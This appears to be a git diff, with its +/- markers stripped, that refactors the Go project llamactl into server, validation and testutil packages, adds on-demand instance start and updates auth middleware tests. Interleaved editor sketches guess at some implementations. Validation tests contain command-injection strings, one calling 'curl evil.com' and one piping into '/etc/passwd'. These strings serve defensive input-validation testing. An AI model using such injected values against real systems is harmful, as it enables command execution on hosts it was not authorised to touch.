if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
instance, err := h.InstanceManager.UpdateInstance(name, &options)
inst, err := h.InstanceManager.UpdateInstance(name, &options)
if err != nil {
http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -239,7 +258,7 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Started instance details"
// @Success 200 {object} instance.Process "Started instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/start [post]
@@ -251,14 +270,14 @@ func (h *Handler) StartInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.StartInstance(name)
inst, err := h.InstanceManager.StartInstance(name)
if err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -272,7 +291,7 @@ func (h *Handler) StartInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Stopped instance details"
// @Success 200 {object} instance.Process "Stopped instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/stop [post]
@@ -284,14 +303,14 @@ func (h *Handler) StopInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.StopInstance(name)
inst, err := h.InstanceManager.StopInstance(name)
if err != nil {
http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -305,7 +324,7 @@ func (h *Handler) StopInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Restarted instance details"
// @Success 200 {object} instance.Process "Restarted instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/restart [post]
@@ -317,14 +336,14 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.RestartInstance(name)
inst, err := h.InstanceManager.RestartInstance(name)
if err != nil {
http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -389,13 +408,13 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
logs, err := instance.GetLogs(num_lines)
logs, err := inst.GetLogs(num_lines)
if err != nil {
http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
return
@@ -426,19 +445,19 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !instance.Running {
if !inst.Running {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
// Get the cached proxy for this instance
proxy, err := instance.GetProxy()
proxy, err := inst.GetProxy()
if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return
@@ -453,6 +472,9 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
proxyPath = "/" + proxyPath
}
// Update the last request time for the instance
inst.UpdateLastRequestTime()
// Modify the request to remove the proxy prefix
originalPath := r.URL.Path
r.URL.Path = proxyPath
@@ -489,11 +511,11 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
}
openaiInstances := make([]OpenAIInstance, len(instances))
for i, instance := range instances {
for i, inst := range instances {
openaiInstances[i] = OpenAIInstance{
ID: instance.Name,
ID: inst.Name,
Object: "model",
Created: instance.Created,
Created: inst.Created,
OwnedBy: "llamactl",
}
}
@@ -545,24 +567,42 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
return
}
// Route to the appropriate instance based on model name
instance, err := h.InstanceManager.GetInstance(modelName)
// Route to the appropriate inst based on model name
inst, err := h.InstanceManager.GetInstance(modelName)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !instance.Running {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
if !inst.Running {
if inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart {
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // timeout comes from config
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
} else {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
}
proxy, err := instance.GetProxy()
proxy, err := inst.GetProxy()
if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return
}
// Update last request time for the instance
inst.UpdateLastRequestTime()
// Recreate the request body from the bytes we read
r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
r.ContentLength = int64(len(bodyBytes))
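// Sketch (editor's addition, not part of this diff): WaitForHealthy is
// implemented in the instance package; per the commit log it polls the
// instance's health check URL directly. A rough sketch, assuming a timeout
// in seconds, llama-server's /health endpoint, and hypothetical host/port
// accessors:
func (i *Process) WaitForHealthy(timeoutSeconds int) error {
	deadline := time.Now().Add(time.Duration(timeoutSeconds) * time.Second)
	// The Host field is an assumption; this diff only shows that Port exists.
	healthURL := fmt.Sprintf("http://%s:%d/health", i.GetOptions().Host, i.GetOptions().Port)
	for time.Now().Before(deadline) {
		resp, err := http.Get(healthURL)
		if err == nil {
			resp.Body.Close()
			if resp.StatusCode == http.StatusOK {
				return nil
			}
		}
		time.Sleep(500 * time.Millisecond)
	}
	return fmt.Errorf("instance %s not healthy after %d seconds", i.Name, timeoutSeconds)
}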


@@ -1,10 +1,11 @@
package llamactl
package server
import (
"crypto/rand"
"crypto/subtle"
"encoding/hex"
"fmt"
"llamactl/pkg/config"
"log"
"net/http"
"os"
@@ -26,7 +27,7 @@ type APIAuthMiddleware struct {
}
// NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
func NewAPIAuthMiddleware(authCfg config.AuthConfig) *APIAuthMiddleware {
var generated bool = false
@@ -35,25 +36,25 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
if config.RequireManagementAuth && len(config.ManagementKeys) == 0 {
if authCfg.RequireManagementAuth && len(authCfg.ManagementKeys) == 0 {
key := generateAPIKey(KeyTypeManagement)
managementAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Management API Key:\n\n %s\n\n", key)
}
for _, key := range config.ManagementKeys {
for _, key := range authCfg.ManagementKeys {
managementAPIKeys[key] = true
}
if config.RequireInferenceAuth && len(config.InferenceKeys) == 0 {
if authCfg.RequireInferenceAuth && len(authCfg.InferenceKeys) == 0 {
key := generateAPIKey(KeyTypeInference)
inferenceAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Inference API Key:\n\n %s\n\n", key)
}
for _, key := range config.InferenceKeys {
for _, key := range authCfg.InferenceKeys {
inferenceAPIKeys[key] = true
}
@@ -66,9 +67,9 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
}
return &APIAuthMiddleware{
requireInferenceAuth: config.RequireInferenceAuth,
requireInferenceAuth: authCfg.RequireInferenceAuth,
inferenceKeys: inferenceAPIKeys,
requireManagementAuth: config.RequireManagementAuth,
requireManagementAuth: authCfg.RequireManagementAuth,
managementKeys: managementAPIKeys,
}
}
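// Note (editor's addition): the import list gains crypto/subtle, which
// suggests provided keys are compared in constant time during validation.
// The validation method itself is not in this hunk; a sketch of what such a
// check could look like:
func keyMatches(stored map[string]bool, provided string) bool {
	match := false
	for key := range stored {
		// Compare every stored key without early exit so timing does not
		// reveal which key matched.
		if subtle.ConstantTimeCompare([]byte(key), []byte(provided)) == 1 {
			match = true
		}
	}
	return match
}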


@@ -1,18 +1,18 @@
package llamactl_test
package server_test
import (
"llamactl/pkg/config"
"llamactl/pkg/server"
"net/http"
"net/http/httptest"
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestAuthMiddleware(t *testing.T) {
tests := []struct {
name string
keyType llamactl.KeyType
keyType server.KeyType
inferenceKeys []string
managementKeys []string
requestKey string
@@ -22,7 +22,7 @@ func TestAuthMiddleware(t *testing.T) {
// Valid key tests
{
name: "valid inference key for inference",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-valid123",
method: "GET",
@@ -30,7 +30,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "valid management key for inference", // Management keys work for inference
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
@@ -38,7 +38,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "valid management key for management",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
@@ -48,7 +48,7 @@ func TestAuthMiddleware(t *testing.T) {
// Invalid key tests
{
name: "inference key for management should fail",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
inferenceKeys: []string{"sk-inference-user123"},
requestKey: "sk-inference-user123",
method: "GET",
@@ -56,7 +56,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "invalid inference key",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-invalid",
method: "GET",
@@ -64,7 +64,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "missing inference key",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "GET",
@@ -72,7 +72,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "invalid management key",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "sk-management-invalid",
method: "GET",
@@ -80,7 +80,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "missing management key",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "GET",
@@ -90,7 +90,7 @@ func TestAuthMiddleware(t *testing.T) {
// OPTIONS requests should always pass
{
name: "OPTIONS request bypasses inference auth",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "OPTIONS",
@@ -98,7 +98,7 @@ func TestAuthMiddleware(t *testing.T) {
},
{
name: "OPTIONS request bypasses management auth",
keyType: llamactl.KeyTypeManagement,
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "OPTIONS",
@@ -108,7 +108,7 @@ func TestAuthMiddleware(t *testing.T) {
// Cross-key-type validation
{
name: "management key works for inference endpoint",
keyType: llamactl.KeyTypeInference,
keyType: server.KeyTypeInference,
inferenceKeys: []string{},
managementKeys: []string{"sk-management-admin"},
requestKey: "sk-management-admin",
@@ -119,11 +119,11 @@ func TestAuthMiddleware(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
config := llamactl.AuthConfig{
cfg := config.AuthConfig{
InferenceKeys: tt.inferenceKeys,
ManagementKeys: tt.managementKeys,
}
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(cfg)
// Create test request
req := httptest.NewRequest(tt.method, "/test", nil)
@@ -133,12 +133,12 @@ func TestAuthMiddleware(t *testing.T) {
// Create test handler using the appropriate middleware
var handler http.Handler
if tt.keyType == llamactl.KeyTypeInference {
handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
@@ -170,17 +170,17 @@ func TestAuthMiddleware(t *testing.T) {
func TestGenerateAPIKey(t *testing.T) {
tests := []struct {
name string
keyType llamactl.KeyType
keyType server.KeyType
}{
{"inference key generation", llamactl.KeyTypeInference},
{"management key generation", llamactl.KeyTypeManagement},
{"inference key generation", server.KeyTypeInference},
{"management key generation", server.KeyTypeManagement},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test auto-generation by creating config that will trigger it
var config llamactl.AuthConfig
if tt.keyType == llamactl.KeyTypeInference {
var config config.AuthConfig
if tt.keyType == server.KeyTypeInference {
config.RequireInferenceAuth = true
config.InferenceKeys = []string{} // Empty to trigger generation
} else {
@@ -189,19 +189,19 @@ func TestGenerateAPIKey(t *testing.T) {
}
// Create middleware - this should trigger key generation
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(config)
// Test that auth is required (meaning a key was generated)
req := httptest.NewRequest("GET", "/", nil)
recorder := httptest.NewRecorder()
var handler http.Handler
if tt.keyType == llamactl.KeyTypeInference {
handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
@@ -214,18 +214,18 @@ func TestGenerateAPIKey(t *testing.T) {
}
// Test uniqueness by creating another middleware instance
middleware2 := llamactl.NewAPIAuthMiddleware(config)
middleware2 := server.NewAPIAuthMiddleware(config)
req2 := httptest.NewRequest("GET", "/", nil)
recorder2 := httptest.NewRecorder()
if tt.keyType == llamactl.KeyTypeInference {
handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if tt.keyType == server.KeyTypeInference {
handler2 := middleware2.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
} else {
handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler2 := middleware2.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
@@ -307,21 +307,21 @@ func TestAutoGeneration(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
config := llamactl.AuthConfig{
cfg := config.AuthConfig{
RequireInferenceAuth: tt.requireInference,
RequireManagementAuth: tt.requireManagement,
InferenceKeys: tt.providedInference,
ManagementKeys: tt.providedManagement,
}
middleware := llamactl.NewAPIAuthMiddleware(config)
middleware := server.NewAPIAuthMiddleware(cfg)
// Test inference behavior if inference auth is required
if tt.requireInference {
req := httptest.NewRequest("GET", "/v1/models", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler := middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
@@ -338,7 +338,7 @@ func TestAutoGeneration(t *testing.T) {
req := httptest.NewRequest("GET", "/api/v1/instances", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
handler := middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
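Taken together, these tests pin down the relocated auth surface: config.AuthConfig drives the key requirements, server.NewAPIAuthMiddleware builds the middleware, and AuthMiddleware(keyType) wraps a handler per key type. A minimal sketch of that wiring outside the test suite, assuming the llamactl/pkg/config and llamactl/pkg/server import paths (only the package names, not the paths, are visible in these hunks):

```go
package main

import (
	"net/http"

	"llamactl/pkg/config" // assumed path, matching the llamactl/pkg/... layout in the validation tests below
	"llamactl/pkg/server" // assumed path
)

func main() {
	cfg := config.AuthConfig{
		RequireInferenceAuth:  true,
		RequireManagementAuth: true,
		InferenceKeys:         []string{"sk-inference-example"},
		ManagementKeys:        []string{"sk-management-example"},
	}
	middleware := server.NewAPIAuthMiddleware(cfg)

	ok := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(http.StatusOK)
	})

	// Each key type guards its own route group, mirroring the router hunks below.
	http.Handle("/v1/", middleware.AuthMiddleware(server.KeyTypeInference)(ok))
	http.Handle("/api/v1/", middleware.AuthMiddleware(server.KeyTypeManagement)(ok))
	_ = http.ListenAndServe(":8080", nil)
}
```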


@@ -1,4 +1,4 @@
package llamactl
package server
type OpenAIListInstancesResponse struct {
Object string `json:"object"`


@@ -1,4 +1,4 @@
package llamactl
package server
import (
"fmt"
@@ -8,7 +8,7 @@ import (
"github.com/go-chi/cors"
httpSwagger "github.com/swaggo/http-swagger"
_ "llamactl/docs"
_ "llamactl/apidocs"
"llamactl/webui"
)
@@ -18,7 +18,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Add CORS middleware
r.Use(cors.Handler(cors.Options{
AllowedOrigins: handler.config.Server.AllowedOrigins,
AllowedOrigins: handler.cfg.Server.AllowedOrigins,
AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
ExposedHeaders: []string{"Link"},
@@ -27,9 +27,9 @@ func SetupRouter(handler *Handler) *chi.Mux {
}))
// Add API authentication middleware
authMiddleware := NewAPIAuthMiddleware(handler.config.Auth)
authMiddleware := NewAPIAuthMiddleware(handler.cfg.Auth)
if handler.config.Server.EnableSwagger {
if handler.cfg.Server.EnableSwagger {
r.Get("/swagger/*", httpSwagger.Handler(
httpSwagger.URL("/swagger/doc.json"),
))
@@ -38,14 +38,16 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Define routes
r.Route("/api/v1", func(r chi.Router) {
if authMiddleware != nil && handler.config.Auth.RequireManagementAuth {
if authMiddleware != nil && handler.cfg.Auth.RequireManagementAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
}
r.Get("/version", handler.VersionHandler()) // Get server version
r.Route("/server", func(r chi.Router) {
r.Get("/help", handler.HelpHandler())
r.Get("/version", handler.VersionHandler())
r.Get("/devices", handler.ListDevicesHandler())
r.Get("/help", handler.LlamaServerHelpHandler())
r.Get("/version", handler.LlamaServerVersionHandler())
r.Get("/devices", handler.LlamaServerListDevicesHandler())
})
// Instance management endpoints
@@ -73,7 +75,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
r.Route(("/v1"), func(r chi.Router) {
if authMiddleware != nil && handler.config.Auth.RequireInferenceAuth {
if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
}
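The router hunk also renames the llama-server passthrough handlers (help/version/devices become LlamaServer*-prefixed, freeing /api/v1/version for llamactl's own VersionHandler) and gates the OpenAI-compatible /v1 group behind the inference key. Serving the result is then a one-liner; a sketch assuming a ready *server.Handler, whose constructor is not part of this diff:

```go
package main

import (
	"log"
	"net/http"

	"llamactl/pkg/server" // assumed path
)

func main() {
	var handler *server.Handler // assumed to be constructed elsewhere; not shown in this diff
	// SetupRouter wires CORS, the auth middleware, and both route groups (shown above).
	log.Fatal(http.ListenAndServe(":8080", server.SetupRouter(handler)))
}
```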

pkg/testutil/helpers.go (new file)

@@ -0,0 +1,10 @@
package testutil
// Helper functions for pointer fields
func BoolPtr(b bool) *bool {
return &b
}
func IntPtr(i int) *int {
return &i
}
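CreateInstanceOptions uses pointer fields so that "not set" is distinguishable from a zero value; hoisting these helpers into pkg/testutil lets the test packages share them instead of each redeclaring boolPtr/intPtr locally (the old private copies are deleted at the bottom of the validation tests below). A typical call site, excerpted in the same style as those tests:

```go
// Pointer fields: nil means "use the default", a non-nil value overrides it.
opts := &instance.CreateInstanceOptions{
	AutoRestart:  testutil.BoolPtr(true),
	MaxRestarts:  testutil.IntPtr(5),
	RestartDelay: testutil.IntPtr(10),
}
```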


@@ -1,7 +1,8 @@
package llamactl
package validation
import (
"fmt"
"llamactl/pkg/instance"
"reflect"
"regexp"
)
@@ -33,7 +34,7 @@ func validateStringForInjection(value string) error {
}
// ValidateInstanceOptions performs minimal security validation
func ValidateInstanceOptions(options *CreateInstanceOptions) error {
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
@@ -101,16 +102,16 @@ func validateStructStrings(v any, fieldPath string) error {
return nil
}
func ValidateInstanceName(name string) error {
func ValidateInstanceName(name string) (string, error) {
// Validate instance name
if name == "" {
return ValidationError(fmt.Errorf("name cannot be empty"))
return "", ValidationError(fmt.Errorf("name cannot be empty"))
}
if !validNamePattern.MatchString(name) {
return ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
}
if len(name) > 50 {
return ValidationError(fmt.Errorf("name too long (max 50 characters)"))
return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
}
return nil
return name, nil
}
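Beyond the package move, note the signature change: ValidateInstanceName now returns (string, error) instead of just error, so callers receive the validated name back and can validate-and-assign in one step (leaving room to normalize names later without touching call sites). A sketch of the new pattern, with hypothetical surrounding variables:

```go
// req.Name and inst are hypothetical; only the function signature comes from the diff.
name, err := validation.ValidateInstanceName(req.Name)
if err != nil {
	return err // a ValidationError describing the failure
}
inst.Name = name // currently returned unchanged, per the implementation above
```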


@@ -1,10 +1,12 @@
package llamactl_test
package validation_test
import (
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"llamactl/pkg/validation"
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestValidateInstanceName(t *testing.T) {
@@ -39,16 +41,23 @@ func TestValidateInstanceName(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := llamactl.ValidateInstanceName(tt.input)
name, err := validation.ValidateInstanceName(tt.input)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
}
if tt.wantErr {
return // Skip further checks if we expect an error
}
// If no error, check that the name is returned as expected
if name != tt.input {
t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
}
})
}
}
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
err := llamactl.ValidateInstanceOptions(nil)
err := validation.ValidateInstanceOptions(nil)
if err == nil {
t.Error("Expected error for nil options")
}
@@ -73,13 +82,13 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Port: tt.port,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
}
@@ -126,13 +135,13 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field)
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: tt.value,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
}
@@ -163,13 +172,13 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field)
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Lora: tt.array,
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
}
@@ -181,13 +190,13 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
// Test that injection in any field is caught
tests := []struct {
name string
options *llamactl.CreateInstanceOptions
options *instance.CreateInstanceOptions
wantErr bool
}{
{
name: "injection in model field",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com",
},
@@ -196,8 +205,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "injection in log file",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd",
},
@@ -206,8 +215,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
},
{
name: "all safe fields",
options: &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log",
@@ -221,7 +230,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
err := llamactl.ValidateInstanceOptions(tt.options)
err := validation.ValidateInstanceOptions(tt.options)
if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
}
@@ -231,11 +240,11 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
// Test that non-string fields don't interfere with validation
options := &llamactl.CreateInstanceOptions{
AutoRestart: boolPtr(true),
MaxRestarts: intPtr(5),
RestartDelay: intPtr(10),
LlamaServerOptions: llamactl.LlamaServerOptions{
options := &instance.CreateInstanceOptions{
AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10),
LlamaServerOptions: llamacpp.LlamaServerOptions{
Port: 8080,
GPULayers: 32,
CtxSize: 4096,
@@ -247,17 +256,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
},
}
err := llamactl.ValidateInstanceOptions(options)
err := validation.ValidateInstanceOptions(options)
if err != nil {
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
}
}
